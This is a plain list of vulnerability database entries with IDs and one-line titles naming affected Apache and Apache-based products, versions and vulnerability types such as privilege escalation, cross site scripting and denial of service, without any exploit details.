| [113895] Apache Geode up to 1.3.x Code Execution
| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
| [113747] Apache Tomcat Servlets privilege escalation
| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
| [112885] Apache Allura up to 1.8.0 File information disclosure
| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
| [112625] Apache POI up to 3.16 Loop denial of service
| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
| [112339] Apache NiFi 1.5.0 Header privilege escalation
| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
| [112114] Oracle 9.1 Apache Log4j privilege escalation
| [112113] Oracle 9.1 Apache Log4j privilege escalation
| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
| [110701] Apache Fineract Query Parameter sql injection
| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
| [110106] Apache CXF Fediz Spring cross site request forgery
| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108938] Apple macOS up to 10.13.1 apache denial of service
| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108935] Apple macOS up to 10.13.1 apache denial of service
| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108931] Apple macOS up to 10.13.1 apache denial of service
| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108929] Apple macOS up to 10.13.1 apache denial of service
| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
| [108782] Apache Xerces2 XML Service denial of service
| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
| [108629] Apache OFBiz up to 10.04.01 privilege escalation
| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
| [107639] Apache NiFi 1.4.0 XML External Entity
| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
| [107197] Apache Xerces Jelly Parser XML File XML External Entity
| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
| [107084] Apache Struts up to 2.3.19 cross site scripting
| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
| [105878] Apache Struts up to 2.3.24.0 privilege escalation
| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
| [105643] Apache Pony Mail up to 0.8b weak authentication
| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
| [103690] Apache OpenMeetings 1.0.0 sql injection
| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
| [103688] Apache OpenMeetings 1.0.0 weak encryption
| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
| [103352] Apache Solr Node weak authentication
| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
| [102536] Apache Ranger up to 0.6 Stored cross site scripting
| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
| [99937] Apache Batik up to 1.8 privilege escalation
| [99936] Apache FOP up to 2.1 privilege escalation
| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
| [99930] Apache Traffic Server up to 6.2.0 denial of service
| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
| [117569] Apache Hadoop up to 2.7.3 privilege escalation
| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
| [99014] Apache Camel Jackson/JacksonXML privilege escalation
| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
| [98605] Apple macOS up to 10.12.3 Apache denial of service
| [98604] Apple macOS up to 10.12.3 Apache denial of service
| [98603] Apple macOS up to 10.12.3 Apache denial of service
| [98602] Apple macOS up to 10.12.3 Apache denial of service
9586| [98601] Apple macOS up to 10.12.3 Apache denial of service
9587| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
9588| [98405] Apache Hadoop up to 0.23.10 privilege escalation
9589| [98199] Apache Camel Validation XML External Entity
9590| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
9591| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
9592| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
9593| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
9594| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
9595| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
9596| [97081] Apache Tomcat HTTPS Request denial of service
9597| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
9598| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
9599| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
9600| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
9601| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
9602| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
9603| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
9604| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
9605| [95311] Apache Storm UI Daemon privilege escalation
9606| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
9607| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
9608| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
9609| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
9610| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
9611| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
9612| [94540] Apache Tika 1.9 tika-server File information disclosure
9613| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
9614| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
9615| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
9616| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
9617| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
9618| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
9619| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
9620| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
9621| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
9622| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
9623| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
9624| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
9625| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
9626| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
9627| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
9628| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
9629| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
9630| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
9631| [93532] Apache Commons Collections Library Java privilege escalation
9632| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
9633| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
9634| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
9635| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
9636| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
9637| [93098] Apache Commons FileUpload privilege escalation
| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
| [92549] Apache Tomcat on Red Hat privilege escalation
| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
